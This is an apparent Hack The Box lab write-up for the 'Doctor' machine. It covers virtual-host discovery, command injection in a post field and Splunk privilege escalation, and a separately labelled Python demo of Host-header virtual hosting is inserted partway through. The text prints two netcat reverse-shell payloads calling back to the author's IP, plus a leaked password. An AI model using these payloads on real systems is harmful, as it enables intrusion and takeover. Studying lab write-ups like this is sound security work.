How I completed the CTF on HTB::Doctor
First, I scanned the target with nmap to find open ports and gather information on the services running on them.
Since it runs an HTTP server on port 80, I opened the target IP address in the web browser and visited the website, but I didn't find anything suspicious to hack.
Finding nothing, I was scratching my head when the address email@example.com caught my eye, and then I did something I hadn't thought of before.
I went to the terminal and typed
sudo nano /etc/hosts to edit the hosts file on my local machine, or simply put, to edit my local DNS.
After editing the hosts file, I went back to the web browser and this time browsed to the domain name (doctors.htb) instead of
10.10.10.209, and a different webpage was rendered.
Isn't this amazing? A different webpage was rendered even though the domain name points to the same IP address.
Let me explain why this happens. If you browse to a box using the appropriate domain name (in our case, doctors.htb), the web server directs you to content based on the Host header that your browser supplies; if you browse with the raw IP instead, you may land on a different webpage, or sometimes on an error page.
You can see this in action right here. You browsed to medium.com and got the page rendered; now if you try browsing directly to
22.214.171.124, you'll be served a different page (in this case an error page).
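To show the behaviour described above in code, here is an added example (not from the write-up): a tiny name-based virtual host server on localhost, queried twice at the same address, once with the raw IP and once with Host: doctors.htb. The vhost table and page bodies are constructed for the demo; only the name doctors.htb comes from the box.

```python
# Name-based virtual hosting: same IP, different page depending on the Host header.
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.request import Request, urlopen

# Constructed vhost table; DEFAULT_SITE is what the server answers when no name matches
VHOSTS = {"doctors.htb": b"<h1>Doctor Secure Messaging (vhost)</h1>"}
DEFAULT_SITE = b"<h1>Doctor (default site)</h1>"


class VHostHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Strip any ":port" suffix, then select the site by name (Apache-style)
        host = self.headers.get("Host", "").split(":")[0].lower()
        body = VHOSTS.get(host, DEFAULT_SITE)
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # silence per-request logging
        pass


def start_server():
    # Port 0 lets the OS pick a free port; the server runs in a background thread
    server = HTTPServer(("127.0.0.1", 0), VHostHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def fetch(port, host_header=None):
    """GET / from the local server; host_header overrides the Host the client sends.
    Overriding Host has the same effect as the /etc/hosts edit in the write-up."""
    req = Request(f"http://127.0.0.1:{port}/")
    if host_header:
        req.add_header("Host", host_header)
    with urlopen(req, timeout=5) as resp:
        return resp.read()


def compare():
    """Return (page for the raw IP, page for doctors.htb) from one and the same server."""
    server = start_server()
    try:
        port = server.server_address[1]
        return fetch(port), fetch(port, "doctors.htb")
    finally:
        server.shutdown()
        server.server_close()
```

Running compare() returns the default site for the raw-IP request and the vhost page for the doctors.htb request, from the same listening socket.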
Okay, back to the action. I tried SQL injection on the login page, but it didn't work. I then looked at the register page, tried registering, and the registration succeeded.
I then logged in with the credentials I had registered with.
Once logged in as a user, I looked around the application and found a page for making a new post. I then opened Netcat to listen on port 4444.
After starting netcat on my local machine, I went back to the website and tried posting.
http://10.10.14.23/$(nc.traditional$IFS-e$IFS/bin/sh$IFS'10.10.14.23'$IFS'4444') posted as content is what triggers the RCE.
10.10.14.23 is my tunnel IP address; to make this work for you, replace it with your own tunnel IP address. This gives shell access to the machine as a low-privileged user.
When I tried viewing the user flag, permission was denied.
While moving around the website I had discovered the /reset_password path, where a user can enter an email and reset the password. Since it was running on an Apache server, I tried accessing the server's log files and looked for a password in the backup file.
I found that the password of the user shaun was
Guitar123, so I logged in as shaun and captured the user flag.
You may have looked at the nmap scan result earlier and noticed that port 8089 is open, with Splunk running on it. So I googled "splunk exploit on github" and found the SplunkWhisperer2 python script by cnotin.
I created a file with
nano splunk-exploit.py, copied the script into it and saved it. After this, I started netcat on port
4445 and ran the exploit with the command:
python3 splunk-exploit.py --host 10.10.10.209 --lhost 10.10.14.23 --username shaun --password Guitar123 --payload "nc.traditional -e /bin/sh '10.10.14.23' '4445'"
Replace 10.10.14.23 with your own tunnel IP address.
It gave me root access within a few seconds, and I captured the root flag.
Share any suggestions you have, and what you liked and disliked in this write-up.